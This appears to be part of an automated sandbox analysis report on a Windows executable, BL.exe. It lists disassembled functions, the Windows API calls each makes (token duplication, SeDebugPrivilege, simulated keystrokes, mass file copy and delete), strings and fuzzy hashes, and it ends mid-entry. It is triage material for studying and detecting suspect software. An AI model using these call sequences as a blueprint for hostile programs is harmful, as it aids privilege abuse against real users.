                                                                                                                            • IsIconic.USER32(?), ref: 004375E1
                                                                                                                            • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                                                                                                                            • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00437619
                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00437645
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0043765D
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00437674
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0043768B
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                                                                                                            • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                            • API String ID: 3778422247-2988720461
                                                                                                                            • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                                            • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                                                                                                            • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                                            • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                                                                                                                            Function 004461ED Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 227processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0044621B
                                                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                                                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                                                                            • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                                                                                                                            • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                                                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                                                                                                                            • _wcslen.LIBCMT ref: 0044639E
                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                            • _wcsncpy.LIBCMT ref: 004463C7
                                                                                                                            • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                                                                            • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                                                                                            • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                                                                                                                            • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                                                                            • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
                                                                                                                            • CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
                                                                                                                            • SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
                                                                                                                            • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                                                                                                            • String ID: $default$winsta0
                                                                                                                            • API String ID: 2173856841-1027155976
                                                                                                                            • Opcode ID: 8f00b2243b6b2de4c09756a88acf23ae7328c143beb0d6de53e41685e08ef567
                                                                                                                            • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                                                                                                                            • Opcode Fuzzy Hash: 8f00b2243b6b2de4c09756a88acf23ae7328c143beb0d6de53e41685e08ef567
                                                                                                                            • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                                                                                                                            Function 00409A40 Relevance: 32.2, APIs: 15, Strings: 2, Instructions: 2432COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _wcslen.LIBCMT ref: 00409A61
                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                            • String ID: 0vH$4RH
                                                                                                                            • API String ID: 1143807570-2085553193
                                                                                                                            • Opcode ID: dfb19c0b99252a150c8462dd9537bd92cb095b10b93da2a1c6000941361394a3
                                                                                                                            • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                                                                                                                            • Opcode Fuzzy Hash: dfb19c0b99252a150c8462dd9537bd92cb095b10b93da2a1c6000941361394a3
                                                                                                                            • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B
                                                                                                                            Function 0044BD29 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\BL.exe,?,C:\Users\user\Desktop\BL.exe,004A8E80,C:\Users\user\Desktop\BL.exe,0040F3D2), ref: 0040FFCA
                                                                                                                              • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
                                                                                                                              • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
                                                                                                                              • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
                                                                                                                              • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                            • _wcscat.LIBCMT ref: 0044BD96
                                                                                                                            • _wcscat.LIBCMT ref: 0044BDBF
                                                                                                                            • __wsplitpath.LIBCMT ref: 0044BDEC
                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                                                                                                                            • _wcscpy.LIBCMT ref: 0044BE73
                                                                                                                            • _wcscat.LIBCMT ref: 0044BE85
                                                                                                                            • _wcscat.LIBCMT ref: 0044BE97
                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 0044BED5
                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BEF5
                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0044BF35
                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BF51
                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                                                            • String ID: \*.*
                                                                                                                            • API String ID: 2188072990-1173974218
                                                                                                                            • Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                                                            • Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
                                                                                                                            • Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                                                            • Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
                                                                                                                            Function 0042039F Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 282timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __invoke_watson.LIBCMT ref: 004203A4
                                                                                                                              • Part of subcall function 00417D93: _memset.LIBCMT ref: 00417DBB
                                                                                                                              • Part of subcall function 00417D93: IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
                                                                                                                              • Part of subcall function 00417D93: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 00417E79
                                                                                                                              • Part of subcall function 00417D93: UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 00417E86
                                                                                                                              • Part of subcall function 00417D93: GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
                                                                                                                              • Part of subcall function 00417D93: TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8
                                                                                                                            • __get_daylight.LIBCMT ref: 004203B0
                                                                                                                            • __invoke_watson.LIBCMT ref: 004203BF
                                                                                                                            • __get_daylight.LIBCMT ref: 004203CB
                                                                                                                            • __invoke_watson.LIBCMT ref: 004203DA
                                                                                                                            • ____lc_codepage_func.LIBCMT ref: 004203E2
                                                                                                                            • _strlen.LIBCMT ref: 00420442
                                                                                                                            • __malloc_crt.LIBCMT ref: 00420449
                                                                                                                            • _strlen.LIBCMT ref: 0042045F
                                                                                                                            • _strcpy_s.LIBCMT ref: 0042046D
                                                                                                                            • __invoke_watson.LIBCMT ref: 00420482
                                                                                                                            • GetTimeZoneInformation.KERNEL32(00496C28), ref: 004204AA
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,00496C2C,?,?,0000003F,?,?), ref: 00420528
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,00496C80,000000FF,?,0000003F,?,?,?,00496C2C,?,?,0000003F,?,?), ref: 0042055C
                                                                                                                              • Part of subcall function 00413A88: __lock.LIBCMT ref: 00413AA6
                                                                                                                              • Part of subcall function 00413A88: ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                                                                              • Part of subcall function 00413A88: ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                                                                              • Part of subcall function 00413A88: RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                                                              • Part of subcall function 00413A88: GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                                                            • __invoke_watson.LIBCMT ref: 004205CC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __invoke_watson$ByteCharExceptionFilterMultiProcessUnhandledWide__get_daylight_strlen$CurrentDebuggerErrorFreeHeapInformationLastPresentTerminateTimeZone____lc_codepage_func___sbh_find_block___sbh_free_block__lock__malloc_crt_memset_strcpy_s
                                                                                                                            • String ID: S\
                                                                                                                            • API String ID: 4084823496-393906132
                                                                                                                            • Opcode ID: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                                                                            • Instruction ID: b357f19af7064e56bcdb8625987f67de7edc2332d57e558cb2e7b84f91b73af7
                                                                                                                            • Opcode Fuzzy Hash: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                                                                            • Instruction Fuzzy Hash: 6A91D371E00125AFDB20EF65EC819AE7BE9EF55300B95003BF540A7253DA3C89828F5C
                                                                                                                            Function 00434D50 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 114fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                                                                                                            • __swprintf.LIBCMT ref: 00434D91
                                                                                                                            • _wcslen.LIBCMT ref: 00434D9B
                                                                                                                            • _wcslen.LIBCMT ref: 00434DB0
                                                                                                                            • _wcslen.LIBCMT ref: 00434DC5
                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                                                                                                            • _memset.LIBCMT ref: 00434E27
                                                                                                                            • _wcslen.LIBCMT ref: 00434E3C
                                                                                                                            • _wcsncpy.LIBCMT ref: 00434E6F
                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                            • String ID: :$\$\??\%s
                                                                                                                            • API String ID: 302090198-3457252023
                                                                                                                            • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                                                            • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                                                                                                                            • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                                                            • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
                                                                                                                            Function 00464422 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 193threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                                                                                            • GetLastError.KERNEL32 ref: 004644B4
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 004644C8
                                                                                                                            • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                            • API String ID: 1312810259-2896544425
                                                                                                                            • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                                            • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                                                                                                                            • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                                            • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                                                                                                                            Function 004037E0 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 359COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                                                                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                                                                                                            • __wsplitpath.LIBCMT ref: 004038B2
                                                                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                            • _wcscpy.LIBCMT ref: 004038C7
                                                                                                                            • _wcscat.LIBCMT ref: 004038DC
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                              • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                                                                                                              • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                                                                                                            • _wcscpy.LIBCMT ref: 004039C2
                                                                                                                            • _wcslen.LIBCMT ref: 00403A53
                                                                                                                            • _wcslen.LIBCMT ref: 00403AAA
                                                                                                                            Strings
                                                                                                                            • Error opening the file, xrefs: 0042B8AC
                                                                                                                            • Unterminated string, xrefs: 0042B9BA
                                                                                                                            • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                                                                                                            • _, xrefs: 00403B48
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                            • API String ID: 4115725249-188983378
                                                                                                                            • Opcode ID: dae9991a875f5349838af7d370b63c7e0fc0eb6370637e81a1d2d3e6c0406ed0
                                                                                                                            • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                                                                                                                            • Opcode Fuzzy Hash: dae9991a875f5349838af7d370b63c7e0fc0eb6370637e81a1d2d3e6c0406ed0
                                                                                                                            • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                                                                                                                            Function 00434BEE Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00434C88
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00434D35
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00434D43
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                            • String ID: *.*
                                                                                                                            • API String ID: 1409584000-438819550
                                                                                                                            • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                                            • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                                                                                                            • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                                            • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                                                                                                            Function 00444078 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94timesleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
